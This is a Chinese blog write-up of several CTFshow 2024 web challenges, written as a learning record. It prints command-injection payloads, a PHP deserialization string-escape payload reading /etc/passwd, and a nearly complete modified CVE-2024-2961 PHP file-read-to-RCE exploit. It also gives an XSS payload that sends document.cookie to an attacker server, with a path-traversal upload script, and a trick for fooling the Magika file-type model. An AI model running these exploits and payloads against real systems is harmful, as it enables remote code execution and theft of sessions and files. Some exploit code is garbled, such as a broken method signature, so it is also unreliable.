CTFshow——2024西瓜杯复现及总结
前言
这是暑假的一场比赛,但是是一直没复现,最后还是了一个时间复现的,总的来说还是学到了很多新知识
锻炼
1.CodeInject
题目描述:热身题目,一血从速
用分号拼接命令即可
"");system('cat /000flag*'
即eval("var_dump("");system('ls');");
2.tpdoor
题目描述:public目录不可写
下载官方源码:
<?php
namespace app\controller;
use app\BaseController;
use think\facade\Db;
class Index extends BaseController
{
protected $middleware = ['think\middleware\AllowCrossDomain','think\middleware\CheckRequestCache','think\middleware\LoadLangPack','think\middleware\SessionInit'];
public function index($isCache = false , $cacheTime = 3600)
{
if($isCache == true){
$config = require __DIR__.'/../../config/route.php';
$config['request_cache_key'] = $isCache;
$config['request_cache_expire'] = intval($cacheTime);
$config['request_cache_except'] = [];
file_put_contents(__DIR__.'/../../config/route.php', '<?php return '. var_export($config, true). ';');
return 'cache is enabled';
}else{
return 'Welcome ,cache is disabled';
}
}
}
发现:$isCahe的值可控,看的出是tp框架,利用报错找到版本
题目给的代码太少,应该是框架本身的漏洞,查框架本身源码
打一个断点继续跟踪查找,
最后看见
故传入iscahe=ls /|systemddss
题目有iscache缓存时间,要多刷新几次才有结果
3.Ezzz_php
mb_strpos()和mb_strpos()在解析字符串时对特殊字符截取偏差导致的字符串逃逸
参考:https://www.cnblogs.com/gxngxngxn/p/18187578
简单来说就是,%9f增加一个字符,%f0减少一个字符
那么需要逃逸多少个字符就要增加多少个%9f
故构造
?read=%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9fO:9:"read_file":2:{s:5:"start";s:9:"gxngxngxn";s:8:"filename";s:11:"/etc/passwd";}&start=aaaaaaaa
这里要多一个%9f,因为要抵消‘[’的影响
接下来就是任意文件提升至rce,考察cve-2024-2961
原脚本:https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py
修改后
#!/usr/bin/env python3
#
# CNEXT: PHP file-read to RCE
# Date: 2024-05-27
# Author: Charles FOL @cfreal_ (LEXFO/AMBIONICS)
#
# TODO Parse LIBC to know if patched
#
# INFORMATIONS
#
# To use, implement the Remote class, which tells the exploit how to send the payload.
#
# REQUIREMENTS
#
# Requires ten: https://github.com/cfreal/ten
#
from __future__ import annotations
import base64
import zlib
from dataclasses import dataclass
from pwn import *
from requests.exceptions import ChunkedEncodingError, ConnectionError
from ten import *
HEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")
class Remote:
"""A helper class to send the payload and download files.
The logic of the exploit is always the same, but the exploit needs to know how to
download files (/proc/self/maps and libc) and how to send the payload.
The code here serves as an example that attacks a page that looks like:
<?php
$data = file_get_contents($_POST['file']);
echo "File contents: $data";
Tweak it to fit your target, and start the exploit.
"""
def __init__(self, url: str) -> None:
self.url = url
self.session = Session()
def send(self, path: str) -> Response:#这个方法是跟着题目不同而不同的,内容要修改
"""Sends given `path` to the HTTP server. Returns the response.
"""
payload_file = 'O:9:"read_file":2:{s:5:"start";s:9:"gxngxngxn";s:8:"filename";s:' + str(len(path)) + ':"' + path + '";}'
payload = "%9f" * (len(payload_file) + 1) + payload_file.replace("+","%2b")#攻击语句,使用前修改
filename_len = "a" * (len(path) + 10)
url = url+f"?start={filename_len}&read={payload}"#注入时的参数,使用前修改
return self.session.get(url=url)
def do -> bytes:
path = f"php://filter/convert.base64-encode/resource={path}"
response = self.send(path)
match = response.re.search(b"File contents: (.*)", flags=re.S)
if match:
data = match.group(1)
return base64.decode(data)
else:
raise ValueError("未能在响应中找到预期的内容。")
@entry
@arg("url", "Target URL")
@arg("command", "Command to run on the system; limited to 0x140 bytes")
@arg("sleep_time", "Time to sleep to assert that the exploit worked. By default, 1.")
@arg("heap", "Address of the main zend_mm_heap structure.")
@arg(
"pad",
"Number of 0x100 chunks to pad with. If the website makes a lot of heap "
"operations with this size, increase this. Defaults to 20.",
)
@dataclass
class Exploit:
"""CNEXT exploit: RCE using a file read primitive in PHP."""
url: str
command: str
sleep: int = 1
heap: str = None
pad: int = 20
def __post_init__(self):
self.remote = Remote(self.url)
self.log = logger("EXPLOIT")
self.info = {}
self.heap = self.heap and int(self.heap, 16)
def check_vulnerable(self) -> None:
"""Checks whether the target is reachable and properly allows for the various
wrappers and filters that the exploit needs.
"""
def safe_download(path: str) -> bytes:
try:
return self.remote.download(path)
except ConnectionError:
failure("Target not [b]reachable[/] ?")
def check_token(text: str, path: str) -> bool:
result = safe_download(path)
return text.encode() == result
text = tf.random.string(50).encode()
base64 = b64(text, misalign=True).decode()
path = f"data:text/plain;base64,{base64}"
result = safe_download(path)
if text not in result:
msg_failure("Remote.download did not return the test string")
print("--------------------")
print(f"Expected test string: {text}")
print(f"Got: {result}")
print("--------------------")
failure("If your code works fine, it means that the [i]data://[/] wrapper does not work")
msg_info("The [i]data://[/] wrapper works")
text = tf.random.string(50)
base64 = b64(text.encode(), misalign=True).decode()
path = f"php://filter//resource=data:text/plain;base64,{base64}"
if not check_token(text, path):
failure("The [i]php://filter/[/] wrapper does not work")
msg_info("The [i]php://filter/[/] wrapper works")
text = tf.random.string(50)
base64 = b64(compress(text.encode()), misalign=True).decode()
path = f"php://filter/zlib.inflate/resource=data:text/plain;base64,{base64}"
if not check_token(text, path):
failure("The [i]zlib[/] extension is not enabled")
msg_info("The [i]zlib[/] extension is enabled")
msg_success("Exploit preconditions are satisfied")
def get_file(self, path: str) -> bytes:
with msg_status(f"Downloading [i]{path}[/]..."):
return self.remote.download(path)
def get_regions(self) -> list[Region]:
"""Obtains the memory regions of the PHP process by querying /proc/self/maps."""
maps = self.get_file("/proc/self/maps")
maps = maps.decode()
PATTERN = re.compile(
r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"
)
regions = []
for region in table.split(maps, strip=True):
if match := PATTERN.match(region):
start = int(match.group(1), 16)
stop = int(match.group(2), 16)
permissions = match.group(3)
path = match.group(4)
if "/" in path or "[" in path:
path = path.rsplit(" ", 1)[-1]
else:
path = ""
current = Region(start, stop, permissions, path)
regions.append(current)
else:
print(maps)
failure("Unable to parse memory mappings")
self.log.info(f"Got {len(regions)} memory regions")
return regions
def get_symbols_and_addresses(self) -> None:
"""Obtains useful symbols and addresses from the file read primitive."""
regions = self.get_regions()
LIBC_FILE = "/dev/shm/cnext-libc"
# PHP's heap
self.info["heap"] = self.heap or self.find_main_heap(regions)
# Libc
libc = self._get_region(regions, "libc-", "libc.so")
self.download_file(libc.path, LIBC_FILE)
self.info["libc"] = ELF(LIBC_FILE, checksec=False)
self.info["libc"].address = libc.start
def _get_region(self, regions: list[Region], *names: str) -> Region:
"""Returns the first region whose name matches one of the given names."""
for region in regions:
if any(name in region.path for name in names):
break
else:
failure("Unable to locate region")
return region
def download_file(self, remote_path: str, local_path: str) -> None:
"""Downloads `remote_path` to `local_path`"""
data = self.get_file(remote_path)
Path(local_path).write(data)
def find_main_heap(self, regions: list[Region]) -> Region:
# Any anonymous RW region with a size superior to the base heap size is a
# candidate. The heap is at the bottom of the region.
heaps = [
region.stop - HEAP_SIZE + 0x40
for region in reversed(regions)
if region.permissions == "rw-p"
and region.size >= HEAP_SIZE
and region.stop & (HEAP_SIZE - 1) == 0
and region.path == ""
]
if not heaps:
failure("Unable to find PHP's main heap in memory")
first = heaps[0]
if len(heaps) > 1:
heaps = ", ".join(map(hex, heaps))
msg_info(f"Potential heaps: [i]{heaps}[/] (using first)")
else:
msg_info(f"Using [i]{hex(first)}[/] as heap")
return first
def run(self) -> None:
self.check_vulnerable()
self.get_symbols_and_addresses()
self.exploit()
def build_exploit_path(self) -> str:
"""
On each step of the exploit, a filter will process each chunk one after the
other. Processing generally involves making some kind of operation either
on the chunk or in a destination chunk of the same size. Each operation is
applied on every single chunk; you cannot make PHP apply iconv on the first 10
chunks and leave the rest in place. That's where the difficulties come from.
Keep in mind that we know the address of the main heap, and the libraries.
ASLR/PIE do not matter here.
The idea is to use the bug to make the freelist for chunks of size 0x100 point
lower. For instance, we have the following free list:
... -> 0x7fffAABBCC900 -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB00
By triggering the bug from chunk ..900, we get:
... -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB48 -> ???
That's step 3.
Now, in order to control the free list, and make it point whereever we want,
we need to have previously put a pointer at address 0x7fffAABBCCB48. To do so,
we'd have to have allocated 0x7fffAABBCCB00 and set our pointer at offset 0x48.
That's step 2.
Now, if we were to perform step2 an then step3 without anything else, we'd have
a problem: after step2 has been processed, the free list goes bottom-up, like:
0x7fffAABBCCB00 -> 0x7fffAABBCCA00 -> 0x7fffAABBCC900
We need to go the other way around. That's why we have step 1: it just allocates
chunks. When they get freed, they reverse the free list. Now step2 allocates in
reverse order, and therefore after step2, chunks are in the correct order.
Another problem comes up.
To trigger the overflow in step3, we convert from UTF-8 to ISO-2022-CN-EXT.
Since step2 creates chunks that contain pointers and pointers are generally not
UTF-8, we cannot afford to have that conversion happen on the chunks of step2.
To avoid this, we put the chunks in step2 at the very end of the chain, and
prefix them with `0\n`. When dechunked (right before the iconv), they will
"disappear" from the chain, preserving them from the character set conversion
and saving us from an unwanted processing error that would stop the processing
chain.
After step3 we have a corrupted freelist with an arbitrary pointer into it. We
don't know the precise layout of the heap, but we know that at the top of the
heap resides a zend_mm_heap structure. We overwrite this structure in two ways.
Its free_slot[] array contains a pointer to each free list. By overwriting it,
we can make PHP allocate chunks whereever we want. In addition, its custom_heap
field contains pointers to hook functions for emalloc, efree, and erealloc
(similarly to malloc_hook, free_hook, etc. in the libc). We overwrite them and
then overwrite the use_custom_heap flag to make PHP use these function pointers
instead. We can now do our favorite CTF technique and get a call to
system(<chunk>).
We make sure that the "system" command kills the current process to avoid other
system() calls with random chunk data, leading to undefined behaviour.
The pad blocks just "pad" our allocations so that even if the heap of the
process is in a random state, we still get contiguous, in order chunks for our
exploit.
Therefore, the whole process described here CANNOT crash. Everything falls
perfectly in place, and nothing can get in the middle of our allocations.
"""
LIBC = self.info["libc"]
ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]
ADDR_EFREE = LIBC.symbols["__libc_system"]
ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]
ADDR_HEAP = self.info["heap"]
ADDR_FREE_SLOT = ADDR_HEAP + 0x20
ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168
ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10
CS = 0x100
# Pad needs to stay at size 0x100 at every step
pad_size = CS - 0x18
pad = b"\x00" * pad_size
pad = chunked_chunk(pad, len(pad) + 6)
pad = chunked_chunk(pad, len(pad) + 6)
pad = chunked_chunk(pad, len(pad) + 6)
pad = compressed_bucket(pad)
step1_size = 1
step1 = b"\x00" * step1_size
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1, CS)
step1 = compressed_bucket(step1)
# Since these chunks contain non-UTF-8 chars, we cannot let it get converted to
# ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"
step2_size = 0x48
step2 = b"\x00" * (step2_size + 8)
step2 = chunked_chunk(step2, CS)
step2 = chunked_chunk(step2)
step2 = compressed_bucket(step2)
step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
step2_write_ptr = chunked_chunk(step2_write_ptr, CS)
step2_write_ptr = chunked_chunk(step2_write_ptr)
step2_write_ptr = compressed_bucket(step2_write_ptr)
step3_size = CS
step3 = b"\x00" * step3_size
assert len(step3) == CS
step3 = chunked_chunk(step3)
step3 = chunked_chunk(step3)
step3 = chunked_chunk(step3)
step3 = compressed_bucket(step3)
step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
assert len(step3_overflow) == CS
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = compressed_bucket(step3_overflow)
step4_size = CS
step4 = b"=00" + b"\x00" * (step4_size - 1)
step4 = chunked_chunk(step4)
step4 = chunked_chunk(step4)
step4 = chunked_chunk(step4)
step4 = compressed_bucket(step4)
# This chunk will eventually overwrite mm_heap->free_slot
# it is actually allocated 0x10 bytes BEFORE it, thus the two filler values
step4_pwn = ptr_bucket(
0x200000,
0,
# free_slot
0,
0,
ADDR_CUSTOM_HEAP, # 0x18
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
ADDR_HEAP, # 0x140
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
size=CS,
)
step4_custom_heap = ptr_bucket(
ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
)
step4_use_custom_heap_size = 0x140
COMMAND = self.command
COMMAND = f"kill -9 $PPID; {COMMAND}"
if self.sleep:
COMMAND = f"sleep {self.sleep}; {COMMAND}"
COMMAND = COMMAND.encode() + b"\x00"
assert (
len(COMMAND) <= step4_use_custom_heap_size
), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"
COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")
step4_use_custom_heap = COMMAND
step4_use_custom_heap = qpe(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)
pages = (
step4 * 3
+ step4_pwn
+ step4_custom_heap
+ step4_use_custom_heap
+ step3_overflow
+ pad * self.pad
+ step1 * 3
+ step2_write_ptr
+ step2 * 2
)
resource = compress(compress(pages))
resource = b64(resource)
resource = f"data:text/plain;base64,{resource.decode()}"
filters = [
# Create buckets
"zlib.inflate",
"zlib.inflate",
# Step 0: Setup heap
"dechunk",
"convert.iconv.latin1.latin1",
# Step 1: Reverse FL order
"dechunk",
"convert.iconv.latin1.latin1",
# Step 2: Put fake pointer and make FL order back to normal
"dechunk",
"convert.iconv.latin1.latin1",
# Step 3: Trigger overflow
"dechunk",
"convert.iconv.UTF-8.ISO-2022-CN-EXT",
# Step 4: Allocate at arbitrary address and change zend_mm_heap
"convert.quoted-printable-decode",
"convert.iconv.latin1.latin1",
]
filters = "|".join(filters)
path = f"php://filter/read={filters}/resource={resource}"
return path
@inform("Triggering...")
def exploit(self) -> None:
path = self.build_exploit_path()
start = time.time()
try:
self.remote.send(path)
except (ConnectionError, ChunkedEncodingError):
pass
msg_print()
if not self.sleep:
msg_print(" [b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]")
elif start + self.sleep <= time.time():
msg_print(" [b white on black] EXPLOIT [/][b white on green] SUCCESS [/]")
else:
# Wrong heap, maybe? If the exploited suggested others, use them!
msg_print(" [b white on black] EXPLOIT [/][b white on red] FAILURE [/]")
msg_print()
def compress(data) -> bytes:
"""Returns data suitable for `zlib.inflate`.
"""
# Remove 2-byte header and 4-byte checksum
return zlib.compress(data, 9)[2:-4]
def b64(data: bytes, misalign=True) -> bytes:
payload = base64.encode(data)
if not misalign and payload.endswith("="):
raise ValueError(f"Misaligned: {data}")
return payload.encode()
def compressed_bucket(data: bytes) -> bytes:
"""Returns a chunk of size 0x8000 that, when dechunked, returns the data."""
return chunked_chunk(data, 0x8000)
def qpe(data: bytes) -> bytes:
"""Emulates quoted-printable-encode.
"""
return "".join(f"={x:02x}" for x in data).upper().encode()
def ptr_bucket(*ptrs, size=None) -> bytes:
"""Creates a 0x8000 chunk that reveals pointers after every step has been ran."""
if size is not None:
assert len(ptrs) * 8 == size
bucket = b"".join(map(p64, ptrs))
bucket = qpe(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = compressed_bucket(bucket)
return bucket
def chunked_chunk(data: bytes, size: int = None) -> bytes:
"""Constructs a chunked representation of the given chunk. If size is given, the
chunked representation has size `size`.
For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`.
"""
# The caller does not care about the size: let's just add 8, which is more than
# enough
if size is None:
size = len(data) + 8
keep = len(data) + len(b"\n\n")
size = f"{len(data):x}".rjust(size - keep, "0")
return size.encode() + b"\n" + data + b"\n"
@dataclass
class Region:
"""A memory region."""
start: int
stop: int
permissions: str
path: str
@property
def size(self) -> int:
return self.stop - self.start
Exploit()
主要修改了
这段代码可以更具页面需求而修改从而实现攻击,代码中的path有多个,有些是攻击指令,还有真是配合php://filter伪协议组合的攻击。
攻击指令:python exp.py url "攻击指令"
P牛对这个cve也有提过,还搭建了环境,可以参考文章:https://blog.csdn.net/jennycisp/article/details/140148391
这个漏洞在nssctf——3rd的cms出现了,也是出自于gxngxngxn师傅之手,当时是只有一解,真的是太厉害了。
这个漏洞适用的范围很广,在php7.0到8点几的版本都适用
## 4.NewerFileDetector
审计源码:
app.py
```python
from flask import Flask,request,session
import magika
import uuid
import json
import os
from bot import visit as bot_visit
import ast
app = Flask(__name__)
app.secret_key = str(uuid.uuid4())
app.static_folder = 'public/'
vip_user = "vip"
vip_pwd = str(uuid.uuid4())
curr_dir = os.path.dirname(os.path.abspath(__file__))
CHECK_FOLDER = os.path.join(curr_dir,"check")
USER_FOLDER = os.path.join(curr_dir,"public/user")
mg = magika.Magika() #深度学习
def isSecure(file_type):
D_extns = ["json",'py','sh', "html"]
if file_type in D_extns:
return False
return True
@app.route("/login",methods=['GET','POST'])
def login():
if(session.get("isSVIP")):
return "logined"
if request.method == "GET":
return "input your username and password plz"
elif request.method == "POST":
try:
user = request.form.get("username").strip()
pwd = request.form.get("password").strip()
if user == vip_user and pwd == vip_pwd:
session["isSVIP"] = "True"
else:
session["isSVIP"] = "False"
# 写入硬盘中,方便bot验证。
file = os.path.join(CHECK_FOLDER,"vip.json")
with open(file,"w") as f:
json.dump({k: v for k, v in session.items()},f)
f.close()
return f"{user} login success"
except:
return "you broke the server,get out!"
@app.route("/upload",methods = ["POST"])
def upload():
try:
content = request.form.get("content").strip()
name = request.form.get("name").strip()
file_type = mg.identify_bytes(content.encode()).output.ct_label #判断文件内容
if isSecure(file_type):
file = os.path.join(USER_FOLDER,name)
with open(file,"w") as f:
f.write(content)
f.close()
return "ok,share your link to bot: /visit?link=user/"+ name
return "black!"
except:
return "you broke the server,fuck out!"
@app.route('/')
def index():
return app.send_static_file('index.html')
@app.route('/visit')
def visit():
link = request.args.get("link")
return bot_visit(link)
@app.route('/share')
def share():
file = request.args.get("file")
return app.send_static_file(file)
@app.route("/clear",methods=['GET'])
def clear():
session.clear()
return "session clear success"
@app.route("/check",methods=['GET'])
def check():
path = os.path.join(CHECK_FOLDER,"vip.json") #join
if os.path.exists(path):
content = open(path,"r").read()
try:
isSVIP = ast.literal_eval(json.loads(content)["isSVIP"])
except:
isSVIP = False
return "VIP" if isSVIP else "GUEST"
else:
return "GUEST"
if __name__ == "__main__":
app.run("0.0.0.0",5050)
bot.py
from selenium import webdriver
import time
import os
# bot nodejs puppter selenium
flag = os.getenv("flag") if os.getenv("flag") is not None else "flag{test}"
option = webdriver.ChromeOptions()
option.add_argument('--headless')
option.add_argument('--no-sandbox')
option.add_argument('--disable-logging')
option.add_argument('--disable-dev-shm-usage')
browser = webdriver.Chrome(options=option)
cookie = {'name': 'flag', 'value': flag, 'domain':'localhost','httpOnly': False}
def visit(link):
try:
browser.get("http://localhost:5050/check") #检测是否为vip
browser.add_cookie(cookie)
page_source = browser.page_source
print(page_source)
if "VIP" not in page_source:
return "NONONO" # pass
print(cookie)
url = "http://localhost:5050/share?file=" + link
if ".." in url:
return "Get out!"
browser.get(url)
time.sleep(1)
browser.quit()
print("success")
return "OK"
except Exception as e:
print(e)
return "you broke the server,get out!"
通过审计可以知道这是一道xss的题目,这里会是否为VIP,flag就会被bot放在cookie里,并访问 "http://localhost:5050/share?file= +link"
分析app.py,/uploads路由可以实现任意文件上传,check会对上传的文件进行检查判断是否为VIP
接着去看magika:https://github.com/google/magika/blob/main/python/src/magika/magika.py
跟进:_get_result_from_bytes->_get_result_from_features->_get_result_or_features_from_bytes
可以看到这里有对文件内容进行了长度判断,如果长度满足就会调用_get_result_from_fewbytes,继续跟进
_get_result_from_few_bytes->_get_ct_label_from_few_bytes
可以看到只要长度满足要求,他就会编码返回txt内容,那么接下来就是去寻找满足长度了,跟进_model_config
发现是从文件中读取的,那么去访问这个文件
长度为16
那么我们只要让长度小于16就行,{"isSVIP":"1"}长度符合
然后就是xss了,写入
<script>fetch("http://vps/?flag="+document.cookie)</script>这里贴上管方wp的脚本
import requests
import magika
mg = magika.Magika()
url = "http://ip:5050/"
D_extns = ["json",'py','sh', "html"]
//覆盖/app/check/vip.json,变成bot眼里的SVIP
vip_json_content = "{\"isSVIP\":\"1\"}"
assert mg.identify_bytes(vip_json_content.encode()).output.ct_label not in D_extns
# print(len(vip_json_content))
r = requests.post(url+"upload",data={"content":vip_json_content,"name":"/app/check/vip.json"})
print(r.text)
// 写XSS
exp_content='<script>fetch("https://yourvps/?flag="+document.cookie)</script>'
assert mg.identify_bytes(exp_content.encode()).output.ct_label not in D_extns
r = requests.post(url+"upload",data={"content":exp_content,"name":"/app/public/test.html"})
print(r.text)
//触发。
requests.get(url+"visit?link=test.html")
这题还有一个解法
骗ai将代码伪装成C#,参考:https://blog.kengwang.com.cn/archives/645/#newerfiledetector
../../check/vip.json
{
"using System" : "// C# code",
"isSVIP" : "True",
"Console.WriteLine(Hello World!);" : "// C# code",
"Console.ReadKey();" : "// C# code",
"/// <summary>" : "// C# code",
"/// This is a summary of the class" : "// C# code",
"/// </summary>" : "// C# code",
"public class MyClass" : "// C# code",
"{" : "// C# code",
"}" : "// C# code",
"public int MyProperty { get; set; }" : "// C# code",
"public int Property { get; set; }" : "// C# code",
"public int aProperty { get; set; }" : "// C# code",
"public int bProperty { get; set; }" : "// C# code"
}
using System
Console.WriteLine(Hello World!);
Console.ReadKey();
/// <summary>
/// This is a summary of the class
/// </summary>
public class MyClass
{
public int MyProperty { get; set; }
public int A { get; set; }// C# code
public int B { get; set; }// C# code
public int C { get; set; }// C# code
public int D { get; set; }// C# code
public int E { get; set; }// C# code
Console.WriteLine(<html>);// C# code
// C# code
}// C# code
Console.WriteLine(<script>
const XHR = new XMLHttpRequest();
XHR.open("POST", "http://localhost:5050/upload");
XHR.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
XHR.send("name=bot&content="+btoa(document.cookie));</script>
}5.easy_polluted
ciscn华东南赛区下线赛污染原题,就不多说了
总结
有错误的地方请大佬们指正。
转载
分享
0 条评论
可输入 255 字
发布投稿
